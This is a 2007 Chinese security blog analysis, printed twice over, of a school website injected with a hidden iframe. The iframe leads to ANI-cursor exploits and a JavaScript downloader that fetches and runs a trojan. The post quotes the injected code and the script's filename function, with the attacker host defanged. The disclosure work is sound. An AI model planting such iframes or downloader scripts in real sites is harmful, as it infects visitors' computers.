某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
2007-04-29 22:06
751 查看
endurer 原创
2007-04-29 第1版
植入的代码为:
/---
<iframe src=hxxp://www.1**8d*m***m.com/d***m*/kehu0739.htm width=0 height=0>
---/
kehu0739.htm的内容所用代码为US-ASCII。
到 http://purpleendurer.ys168.com 下载 US-ASCII加密、解密程序 解密后得到的内容包含代码:
/---
<DIV id=new_content_jp style="DISPLAY: none">
<DIV style="CURSOR: url('hxxp://www.1**8d*m***m.com/wangma/39a.jpg')">
<DIV style="CURSOR: url('hxxp://www.1**8d*m***m.com/wangma/39b.jpg')"></DIV></DIV></DIV>
<SCRIPT language=javascript src="hxxp://www.1**8d*m***m.com/wangma/39.js"></SCRIPT>
<iframe src=hxxp://www.1**8d*m***m.com/wangma/061439.htm width=0 height=0></iframe>
---/
hxxp://www.1**8d*m***m.com/wangma/39a.jpg(Kaspersky 报为 Exploit.Win32.ImG-ANI.ac)和 39b.jpg 利用 ANI漏洞 下载Hxxp://1**8d*m***m.com/xi*a***/kehu0739.exe
文件说明符 : D:/test/kehu0739.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-29 17:32:50
修改时间 : 2007-4-29 17:38:32
访问时间 : 2007-4-29 17:40:1
大小 : 16603 字节 16.219 KB
MD5 : defe53aaf22ed8273236c45b562f2628
UpackByDwing
Kaspersky 报为 Trojan-Downloader.Win32.Delf.bho。
hxxp://www.1**8d*m***m.com/wangma/39.js
每隔300毫秒执行自定义函数checkIE(),checkIE()检测IE版本,并写入代码
/---
<div style=/"cursor: url(/'hxxp://www.1**8d*m***m.com/wangma/39a.jpg/')/"><div style=/"cursor: url(/'hxxp://www.1**8d*m***m.com/wangma/39b.jpg/')/">
---/
hxxp://www.1**8d*m***m.com/wangma/39a.jpg 和 39b.jpg(Kaspersky 均报为 Exploit.Win32.ImG-ANI.ac)同样是利用ANI漏洞下载 kehu0739.exe。
hxxp://www.1**8d*m***m.com/wangma/061439.htm 内容所用代码为US-ASCII。
解密后的内容为Javascript脚本代码,功能是利用 Microsoft.XMLhttp 和 scrīpting.FileSystemObject 下载文件 kehu0739.exe,保存到%windir%,文件名为 rising****.exe,其中****为 数字,由自定义函数:
/---
function fk(n){var number = Math.random()*n;
return Math.round(number)+'.exe';}
---/
生成。然后通过 Shell.Application 对象Q 的 ShellExecute 方法 执行命令: %windir%/system32/cmd.exe /c %windir%/rising****.exe 来运行。
2007-04-29 第1版
植入的代码为:
/---
<iframe src=hxxp://www.1**8d*m***m.com/d***m*/kehu0739.htm width=0 height=0>
---/
kehu0739.htm的内容所用代码为US-ASCII。
到 http://purpleendurer.ys168.com 下载 US-ASCII加密、解密程序 解密后得到的内容包含代码:
/---
<DIV id=new_content_jp style="DISPLAY: none">
<DIV style="CURSOR: url('hxxp://www.1**8d*m***m.com/wangma/39a.jpg')">
<DIV style="CURSOR: url('hxxp://www.1**8d*m***m.com/wangma/39b.jpg')"></DIV></DIV></DIV>
<SCRIPT language=javascript src="hxxp://www.1**8d*m***m.com/wangma/39.js"></SCRIPT>
<iframe src=hxxp://www.1**8d*m***m.com/wangma/061439.htm width=0 height=0></iframe>
---/
hxxp://www.1**8d*m***m.com/wangma/39a.jpg(Kaspersky 报为 Exploit.Win32.ImG-ANI.ac)和 39b.jpg 利用 ANI漏洞 下载Hxxp://1**8d*m***m.com/xi*a***/kehu0739.exe
文件说明符 : D:/test/kehu0739.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-29 17:32:50
修改时间 : 2007-4-29 17:38:32
访问时间 : 2007-4-29 17:40:1
大小 : 16603 字节 16.219 KB
MD5 : defe53aaf22ed8273236c45b562f2628
UpackByDwing
Kaspersky 报为 Trojan-Downloader.Win32.Delf.bho。
hxxp://www.1**8d*m***m.com/wangma/39.js
每隔300毫秒执行自定义函数checkIE(),checkIE()检测IE版本,并写入代码
/---
<div style=/"cursor: url(/'hxxp://www.1**8d*m***m.com/wangma/39a.jpg/')/"><div style=/"cursor: url(/'hxxp://www.1**8d*m***m.com/wangma/39b.jpg/')/">
---/
hxxp://www.1**8d*m***m.com/wangma/39a.jpg 和 39b.jpg(Kaspersky 均报为 Exploit.Win32.ImG-ANI.ac)同样是利用ANI漏洞下载 kehu0739.exe。
hxxp://www.1**8d*m***m.com/wangma/061439.htm 内容所用代码为US-ASCII。
解密后的内容为Javascript脚本代码,功能是利用 Microsoft.XMLhttp 和 scrīpting.FileSystemObject 下载文件 kehu0739.exe,保存到%windir%,文件名为 rising****.exe,其中****为 数字,由自定义函数:
/---
function fk(n){var number = Math.random()*n;
return Math.round(number)+'.exe';}
---/
生成。然后通过 Shell.Application 对象Q 的 ShellExecute 方法 执行命令: %windir%/system32/cmd.exe /c %windir%/rising****.exe 来运行。
相关文章推荐
- 某网络硬盘网站被植入传播Trojan.DL.Inject.xz等的代码
- 某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码
- 某论坛新游试玩区被植入利用ANI漏洞传播 Trojan.Mnless.kip 的代码
- 某市职业经理人高级研修学院网站被植入传播Backdoor.Gpigeon.GEN的代码
- 某光集团网站被加入利用ANI漏洞传播Worm.Win32.Viking.ix的代码
- 刘三姐故乡网站加挂Trojan-PSW.Win32.Delf.qc,Worm.Win32.Agent.uu等
- 某易论坛被植入利用ANI漏洞传播 Backdoor.Win32.Agent.ahj 的代码
- 某网站挂Trojan-Downloader.SWF.Small利用flash漏洞传播Trojan-Downloader.Win32.Small
- 几大知名流量统计网站的统计脚本中相继植入广告代码的现象,严重影响上网体验
- 如何处理网站被植入恶意的一些代码导致的被机房拦截提示
- 某市国税信息检索系统被植入传播Worm.Win32.Delf.bs的代码
- 【一周时讯技评】安卓平台挖矿蠕虫ADB.Miner勃然而兴,中韩两国成为重灾区|Apple应用下载网站被发现传播挖矿代码
- 一个被加入下载木马Trojan-Downloader.Win32.Delf.ajm的网站
- 某省盐业网被植入传播Trojan.DL.Win32.Agent.zrc的代码
- 一个被加入下载Trojan.DL.Agent.yhm的代码的网站
- 某留学网站被植入利用 PPStream 堆栈漏洞的代码
- 浅谈服务器或网站被植入病毒代码的原因
- 网站连接QQ的代码